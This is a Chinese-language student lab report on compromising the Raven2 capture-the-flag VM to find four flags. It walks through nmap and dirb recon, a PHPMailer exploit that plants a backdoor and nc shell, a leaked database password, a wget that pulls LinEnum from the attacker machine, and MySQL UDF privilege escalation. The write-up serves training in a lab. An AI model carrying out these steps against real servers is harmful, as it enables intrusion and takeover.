1. 实训目的
通过此次实验来学习对Raven2的渗透,(Raven:2是中级boot2root VM。有四个要捕获的标志。在多次破坏之后,Raven Security采取了额外的措施来加固其Web服务器,以防止黑客),找到四个flag,学习一些渗透的基础知识。
2. 实训原理
在虚拟机上使用kali做为攻击机,对靶机进行渗透,使用kali上自带的nmap工具扫描靶机的ip地址,接下来使用dirb爆破网站的文件目录,获得一些有用的信息,使用网站所有的漏洞进行利用,寻找所需要的flag,最后进行提权以此获得root权限
3. 实训环境
测试环境:VMware workstations14
渗透机:kali-linux2019,ip:192.168.0.103
测试机:Raven2,ip:192.1680.106
连接方式:网络配置都选用桥接模式
4. 实训步骤
一、信息收集
1.1查看kali的ip地址
1.2使用arp-scan -l扫描靶机的ip
1.3使用nmap扫描靶机开启的端口以及服务
端口22开启的ssh可以进行爆破,80端口的http,可以在浏览器上访问
1.4浏览器上访问靶机的ip地址
1.5使用dirb对网站的文件目录爆破,得到网站的相对路径
dirb是一个轻量级的目录爆破工具,可以用它来快速的对目录进行一个简单的探测
1.5.1在浏览器访问http://192.168.0.106/vendor/
1.5.2查看PATH目录下找到flag1
1.5.3在examples目录下发现PHPMailer 邮件服务以及对应的版本(PHPMailer是一个用于发送电子邮件的PHP函数包)
二、漏洞利用(PHPMailer漏洞利用)(searchsploit phpmailer)
2.1选用40974.py.使用cp命令将py文件复制到自己相应的目录里,并且使用vim编辑器打开
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/
vim 40974.py
2.2运行python代码(python 40974.py)
2.3浏览器访问http://192.168.0.106/contact.php生成后门文件
2.4用nc开启监听并访问http://192.168.0.106/sky.php 获得一个低级的shell,并且用python获取pty得到交互式的shell
2.5在var目录下全局搜索flag
flag2.txt与链接flag3.png
2.6查看flag2
cd /var/www
cat flag2.txt
2.7浏览器访问http://192.168.0.106/wordpress/wp-content/uploads/2018/11/flag3.png
2.8查找数据库的账号密码
得到数据库账号:root ,数据库密码:R@v3nSecurity
三、权限提升并找flag4
3.1在kali终端下载枚举漏洞工具LinEnum
https://github.com/rebootuser/LinEnum
3.2用python搭建一个简单的服务器来把文件下载到靶机里面
python -m http.server 6666-----文件内打开终端!!!!
3.3 在靶机上使用wget下载
wget http://192.168.0.103:6666/LinEnum.sh
3.5需要提权,chmod修改权限后,再./LinEnum.sh执行
3.6要查找MySQL版本
如果MySQL版本 <= 5.7.14,5.6.32,5.5.51就可以使用该漏洞提权,,此版本的MySQL容易受到UDF(用户定义函数)漏洞的攻击
3.7漏洞利用(在kali终端)
3.8使用python模块创建服务器
python2 -m SimpleHTTPServer 8080
3.9把文件ok.so利用服务器传输到靶机上(下面的ip为kali的IP)
3.10进入数据库--创建数据表--插入数据--新建存储函数
成功提权并且查看flag4.txt